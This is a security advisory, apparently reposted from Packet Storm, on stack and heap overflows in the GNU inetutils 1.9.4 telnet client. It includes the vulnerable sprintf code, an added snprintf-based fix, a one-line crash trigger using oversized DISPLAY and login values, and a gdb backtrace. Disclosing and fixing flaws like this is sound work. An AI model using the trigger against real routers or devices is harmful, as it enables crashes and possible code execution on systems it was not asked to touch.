Reported 14 Dec 2018 by Hacker Fantastic. Type: packetstorm. Source: packetstormsecurity.com

GNU inetutils 1.9.4 telnet.c stack and heap overflow

GNU inetutils <= 1.9.4 telnet.c multiple overflows
==================================================

GNU inetutils is vulnerable to a stack overflow in the client-side environment variable handling, which can be exploited to escape restricted shells on embedded devices. Most modern browsers no longer support telnet:// handlers, but in instances where a URI handler is wired up to the inetutils telnet client this issue may be remotely triggerable. A stack-based overflow is present in the handling of environment variables when telnet.c connects to a remote telnet server with an oversized DISPLAY argument.

A heap overflow is also present, which can be triggered in a different code path by supplying oversized environment variables to the client connection code.

The stack-based overflow can be seen in the following code snippet from the latest inetutils release, dated 2015.

inetutils-telnet/inetutils-1.9.4/telnet/telnet.c

```c
983-    case TELOPT_XDISPLOC:
984-      if (my_want_state_is_wont (TELOPT_XDISPLOC))
985-        return;
986-      if (SB_EOF ())
987-        return;
988-      if (SB_GET () == TELQUAL_SEND)
989-        {
990-          unsigned char temp[50], *dp;
991-          int len;
992-
993-          if ((dp = env_getvalue ("DISPLAY")) == NULL)
994-            {
995-              /*
996-               * Something happened, we no longer have a DISPLAY
997-               * variable. So, turn off the option.
998-               */
999-              send_wont (TELOPT_XDISPLOC, 1);
1000-             break;
1001-           }
1002:         sprintf ((char *) temp, "%c%c%c%c%s%c%c", IAC, SB, TELOPT_XDISPLOC,
1003-                  TELQUAL_IS, dp, IAC, SE);
1004-         len = strlen ((char *) temp + 4) + 4; /* temp[3] is 0 ... */
1005-
1006-         if (len < NETROOM ())
```
When a telnet server requests environment options, the sprintf on line 1002 performs no bounds checking and overflows the stack buffer temp[50] defined at line 990 whenever the DISPLAY value is longer than the buffer. This issue can be trivially fixed with a patch that adds bounds checking to the sprintf, such as a call to snprintf().
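The snprintf()-based fix suggested above, written out as an added example (this is not inetutils code). It rebuilds the XDISPLOC "IS" reply into a buffer of the same 50-byte size as temp[50] and treats a truncated result as an error, because a silently truncated reply would both lose data and lack the closing IAC SE, leaving the peer inside an unterminated suboption. The protocol constants are the standard telnet values (RFC 854/855 and RFC 1096); the function names, the test inputs and the 50-byte size are assumptions for the example.

```c
/* Added example, not inetutils code: a bounds-checked replacement for the
 * sprintf() at telnet.c line 1002 that builds IAC SB XDISPLOC IS <display> IAC SE.
 * Constants are the standard telnet codes; the buffer size mirrors temp[50]
 * from the advisory snippet (assumption: the caller keeps that size). */
#include <stdio.h>
#include <string.h>
#include <stddef.h>

#define IAC             255
#define SB              250
#define SE              240
#define TELOPT_XDISPLOC 35
#define TELQUAL_IS      0

#define XDISPLOC_REPLY_SIZE 50   /* same size as temp[50] in the advisory */

/*
 * Build the XDISPLOC "IS" suboption into out[outsz].
 * Returns the number of bytes to put on the wire, or -1 if the reply would
 * not fit. On -1 the caller should refuse the option (e.g. send_wont()) rather
 * than send a truncated suboption, which would be missing its IAC SE trailer.
 */
int build_xdisploc_reply(const char *display, unsigned char *out, size_t outsz)
{
    if (display == NULL || out == NULL || outsz == 0)
        return -1;

    /* snprintf() reports the length it WOULD have written, so its return value
     * tells us whether the buffer was large enough. TELQUAL_IS is the byte 0,
     * so out[3] is an embedded NUL: strlen() over the whole buffer would stop
     * there, which is why the original code measured from temp + 4. */
    int n = snprintf((char *)out, outsz, "%c%c%c%c%s%c%c",
                     IAC, SB, TELOPT_XDISPLOC, TELQUAL_IS,
                     display, IAC, SE);
    if (n < 0 || (size_t)n >= outsz)   /* >= leaves room for the terminating NUL */
        return -1;
    return n;
}

/* Longest DISPLAY value that fits: 4 header bytes + value + IAC SE + NUL. */
size_t max_display_len(size_t outsz)
{
    return outsz > 7 ? outsz - 7 : 0;
}

/* Constructed test input: a DISPLAY value of n 'A' characters (capped at 255). */
static const char *display_of_len(size_t n)
{
    static char buf[256];
    if (n >= sizeof buf)
        n = sizeof buf - 1;
    memset(buf, 'A', n);
    buf[n] = '\0';
    return buf;
}

/* Reply length for a DISPLAY of n 'A's with the 50-byte buffer, -1 if rejected. */
int reply_len_for(size_t n)
{
    unsigned char out[XDISPLOC_REPLY_SIZE];
    return build_xdisploc_reply(display_of_len(n), out, sizeof out);
}

/* Byte-level check of the framing for DISPLAY=":0"; returns 1 if correct. */
int framing_ok(void)
{
    unsigned char out[XDISPLOC_REPLY_SIZE];
    int n = build_xdisploc_reply(":0", out, sizeof out);
    return n == 8 && out[0] == IAC && out[1] == SB && out[2] == TELOPT_XDISPLOC
        && out[3] == TELQUAL_IS && out[4] == ':' && out[5] == '0'
        && out[6] == IAC && out[7] == SE;
}

int main(void)
{
    size_t lens[] = { 2, 43, 44, 5000 };
    for (size_t i = 0; i < sizeof lens / sizeof lens[0]; i++)
        printf("DISPLAY of %zu bytes -> reply length %d\n",
               lens[i], reply_len_for(lens[i]));
    printf("max DISPLAY length for a %d-byte buffer: %zu\n",
           XDISPLOC_REPLY_SIZE, max_display_len(XDISPLOC_REPLY_SIZE));
    return framing_ok() ? 0 : 1;
}
```

With the 50-byte buffer a 43-character DISPLAY still fits (49 bytes plus NUL) while 44 characters are rejected; the original sprintf() would have written past temp for any value of 44 characters or more.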
An example of the heap overflow can be seen when handling large environment variables within the telnet client, causing heap buffer memory corruption through a long string supplied in, for example, USER or DISPLAY.

An example of triggering this issue on inetutils in Arch Linux can be seen below:

```
DISPLAY=`perl -e 'print "A"x50000'` telnet -l`perl -e 'print "A"x5000'` 192.168.69.1
Trying 192.168.69.1...
Connected to 192.168.69.1.
Escape character is '^]'.
realloc(): invalid next size
Aborted (core dumped)
```

These issues are present anywhere inetutils is used as a base for clients, such as in common embedded home routers or networking equipment. An attacker can potentially exploit these vulnerabilities to gain arbitrary code execution on platforms where telnet commands are available. An example debug trace of the heap overflow can be found below:

```
(gdb) run -l`perl -e 'print "A"x5000'` 192.168.69.1
Starting program: /usr/bin/telnet -l`perl -e 'print "A"x5000'` 192.168.69.1
Trying 192.168.69.1...
Connected to 192.168.69.1.
Escape character is '^]'.
realloc(): invalid next size

Program received signal SIGABRT, Aborted.
0x00007ffff7d87d7f in raise () from /usr/lib/libc.so.6
(gdb) bt
#0  0x00007ffff7d87d7f in raise () from /usr/lib/libc.so.6
#1  0x00007ffff7d72672 in abort () from /usr/lib/libc.so.6
#2  0x00007ffff7dca878 in __libc_message () from /usr/lib/libc.so.6
#3  0x00007ffff7dd118a in malloc_printerr () from /usr/lib/libc.so.6
#4  0x00007ffff7dd52ac in _int_realloc () from /usr/lib/libc.so.6
#5  0x00007ffff7dd62df in realloc () from /usr/lib/libc.so.6
#6  0x000055555556029c in ?? ()
#7  0x0000555555560116 in ?? ()
#8  0x000055555556049f in ?? ()
#9  0x00005555555606b7 in ?? ()
#10 0x00005555555616de in ?? ()
#11 0x0000555555561b8d in ?? ()
#12 0x0000555555562122 in ?? ()
#13 0x000055555555c6f4 in ?? ()
#14 0x00005555555591e7 in ?? ()
#15 0x00007ffff7d74223 in __libc_start_main () from /usr/lib/libc.so.6
#16 0x00005555555592be in ?? ()
```

Due to the various devices embedding telnet from inetutils and distributions such as Arch Linux using the inetutils telnet, the full impact and all scenarios in which this issue could be leveraged are unclear. An attacker may seek to exploit these vulnerabilities to escape restricted shells.

-- Hacker Fantastic (11/12/2018)

https://hacker.house
